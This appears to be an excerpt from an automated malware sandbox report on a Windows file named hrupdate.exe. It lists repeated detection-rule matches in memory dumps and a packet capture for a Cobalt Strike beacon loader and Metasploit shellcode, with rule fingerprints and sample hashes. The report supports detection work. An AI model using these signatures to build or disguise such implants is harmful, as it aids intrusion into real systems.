      Source: 00000000.00000003.2873052676.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: 00000000.00000003.2873052676.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: unknown
      Source: 00000000.00000003.2325614801.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
      Source: 00000000.00000003.2325614801.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
      Source: 00000000.00000003.2325614801.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: 00000000.00000003.2325614801.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: unknown
      Source: 00000000.00000003.2258966363.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
      Source: 00000000.00000003.2258966363.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
      Source: 00000000.00000003.2258966363.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: 00000000.00000003.2258966363.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: unknown
      Source: 00000000.00000003.2166372998.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
      Source: 00000000.00000003.2166372998.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
      Source: 00000000.00000003.2166372998.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: 00000000.00000003.2166372998.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: unknown
      Source: 00000000.00000003.1920557369.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
      Source: 00000000.00000003.1920557369.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
      Source: 00000000.00000003.1920557369.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: 00000000.00000003.1920557369.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: unknown
      Source: 00000000.00000003.1737677709.0000000001272000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
      Source: 00000000.00000003.1737677709.0000000001272000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
      Source: 00000000.00000003.1737677709.0000000001272000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: 00000000.00000003.1737677709.0000000001272000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: unknown
      Source: 00000000.00000003.2009759861.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
      Source: 00000000.00000003.2009759861.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
      Source: 00000000.00000003.2009759861.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: 00000000.00000003.2009759861.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: unknown
      Source: 00000000.00000003.2391768774.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
      Source: 00000000.00000003.2391768774.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
      Source: 00000000.00000003.2391768774.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: 00000000.00000003.2391768774.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: unknown
      Source: 00000000.00000003.2369855570.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
      Source: 00000000.00000003.2369855570.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
      Source: 00000000.00000003.2369855570.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: 00000000.00000003.2369855570.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: unknown
      Source: 00000000.00000003.1787841021.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
      Source: 00000000.00000003.1787841021.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
      Source: 00000000.00000003.1787841021.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: 00000000.00000003.1787841021.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: unknown
      Source: 00000000.00000003.1787904161.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
      Source: 00000000.00000003.1787904161.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
      Source: 00000000.00000003.1787904161.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: 00000000.00000003.1787904161.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: unknown
      Source: 00000000.00000003.2672627647.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
      Source: 00000000.00000003.2672627647.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
      Source: 00000000.00000003.2672627647.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: 00000000.00000003.2672627647.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: unknown
      Source: 00000000.00000003.2303560240.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
      Source: 00000000.00000003.2303560240.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
      Source: 00000000.00000003.2303560240.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: 00000000.00000003.2303560240.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: unknown
      Source: 00000000.00000003.1942656539.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
      Source: 00000000.00000003.1942656539.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
      Source: 00000000.00000003.1942656539.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: 00000000.00000003.1942656539.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: unknown
      Source: 00000000.00000002.2942922670.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
      Source: 00000000.00000002.2942922670.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
      Source: 00000000.00000002.2942922670.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: 00000000.00000002.2942922670.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: unknown
      Source: 00000000.00000003.2505022354.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
      Source: 00000000.00000003.2505022354.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
      Source: 00000000.00000003.2505022354.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: 00000000.00000003.2505022354.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: unknown
      Source: 00000000.00000003.2347750483.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
      Source: 00000000.00000003.2347750483.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
      Source: 00000000.00000003.2347750483.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: 00000000.00000003.2347750483.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: unknown
      Source: 00000000.00000003.2188557331.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
      Source: 00000000.00000003.2188557331.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
      Source: 00000000.00000003.2188557331.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: 00000000.00000003.2188557331.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: unknown
      Source: 00000000.00000003.1854632916.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
      Source: 00000000.00000003.1854632916.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
      Source: 00000000.00000003.1854632916.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: 00000000.00000003.1854632916.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: unknown
      Source: 00000000.00000003.1920477423.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
      Source: 00000000.00000003.1920477423.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
      Source: 00000000.00000003.1920477423.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: 00000000.00000003.1920477423.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: unknown
      Source: 00000000.00000003.2236236442.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
      Source: 00000000.00000003.2236236442.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
      Source: 00000000.00000003.2236236442.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: 00000000.00000003.2236236442.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: unknown
      Source: 00000000.00000003.2872941960.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
      Source: 00000000.00000003.2872941960.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
      Source: 00000000.00000003.2872941960.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: 00000000.00000003.2872941960.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: unknown
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FC7D88 GetLastError,CreateProcessWithLogonW,GetLastError,_memset,GetLastError,0_2_04FC7D88
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FEC4E00_2_04FEC4E0
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FE05A60_2_04FE05A6
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FE99E80_2_04FE99E8
      Source: hrupdate.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: dump.pcap, type: PCAPMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: 00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: 00000000.00000003.2210862324.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000000.00000003.2210862324.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000000.00000003.2210862324.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000000.00000003.2210862324.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: 00000000.00000003.2873052676.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000000.00000003.2873052676.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000000.00000003.2873052676.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000000.00000003.2873052676.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: 00000000.00000003.2325614801.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000000.00000003.2325614801.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000000.00000003.2325614801.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000000.00000003.2325614801.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: 00000000.00000003.2258966363.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000000.00000003.2258966363.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000000.00000003.2258966363.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000000.00000003.2258966363.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: 00000000.00000003.2166372998.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000000.00000003.2166372998.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000000.00000003.2166372998.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
